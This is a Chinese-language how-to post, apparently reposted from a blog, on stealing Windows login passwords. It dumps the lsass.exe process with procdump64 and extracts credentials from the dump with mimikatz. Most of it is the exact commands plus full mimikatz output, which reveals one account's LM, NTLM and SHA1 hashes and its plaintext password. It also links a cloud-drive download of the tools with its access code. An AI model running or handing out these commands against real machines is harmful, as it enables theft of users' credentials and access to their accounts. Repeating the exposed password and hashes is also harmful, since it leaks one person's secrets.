兩步完成利用procdump64+mimikatz獲取win用戶密碼


使用procdump64+mimikatz可實現從內存中獲取明文密碼

工具

鏈接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密碼:fc38

首先得先獲取到內存文件lsass.exe進程, 它用於本地安全和登陸策略,一般在進程管理器中能看到, 比如這樣

1.導出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

 (注:必須使用管理員權限)

ProcDump v8.0 - Writes process dump files
Copyright (C) 2009-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards

[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp
[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.
[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds
[15:33:28] Dump count reached.

2.執行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必須使用管理員權限)

ECHO 處於打開狀態。

  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 137859 (00000000:00021a83)
Session           : Interactive from 1
User Name         : chenglee
Domain            : chenglee-PC
Logon Server      : CHENGLEE-PC
Logon Time        : 2018/7/25 15:06:35
SID               : S-1-5-21-452281122-3045282507-3243563612-1000
	msv :	
	 [00000003] Primary
	 * Username : chenglee
	 * Domain   : chenglee-PC
	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
	 * NTLM     : 8d0f8e1a18236379538411a9056799f5
	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
	tspkg :	
	 * Username : chenglee
	 * Domain   : chenglee-PC
	 * Password : lizhenghua
	wdigest :	
	 * Username : chenglee
	 * Domain   : chenglee-PC
	 * Password : lizhenghua
	kerberos :	
	 * Username : chenglee
	 * Domain   : chenglee-PC
	 * Password : lizhenghua
	ssp :	
	credman :	

Authentication Id : 0 ; 137821 (00000000:00021a5d)
Session           : Interactive from 1
User Name         : chenglee
Domain            : chenglee-PC
Logon Server      : CHENGLEE-PC
Logon Time        : 2018/7/25 15:06:35
SID               : S-1-5-21-452281122-3045282507-3243563612-1000
	msv :	
	 [00000003] Primary
	 * Username : chenglee
	 * Domain   : chenglee-PC
	 * LM       : 9cffd5e7eefa14babacbf0b4adf55fde
	 * NTLM     : 8d0f8e1a18236379538411a9056799f5
	 * SHA1     : 989281f47698b73e026160e842d86bc64c9e3c20
	tspkg :	
	 * Username : chenglee
	 * Domain   : chenglee-PC
	 * Password : lizhenghua
	wdigest :	
	 * Username : chenglee
	 * Domain   : chenglee-PC
	 * Password : lizhenghua
	kerberos :	
	 * Username : chenglee
	 * Domain   : chenglee-PC
	 * Password : lizhenghua
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:15
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CHENGLEE-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:15
SID               : S-1-5-20
	msv :	
	tspkg :	
	wdigest :	
	 * Username : CHENGLEE-PC$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : chenglee-pc$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 48630 (00000000:0000bdf6)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:06
SID               : 
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CHENGLEE-PC$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2018/7/25 15:06:05
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : CHENGLEE-PC$
	 * Domain   : WORKGROUP
	 * Password : (null)
	kerberos :	
	 * Username : chenglee-pc$
	 * Domain   : WORKGROUP
	 * Password : (null)
	ssp :	
	credman :	

mimikatz(commandline) # exit
Bye!

 看, 密碼[lizhenghua]處於明文暴露狀態.

如果不是使用管理員模式運行cmd會報錯,

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM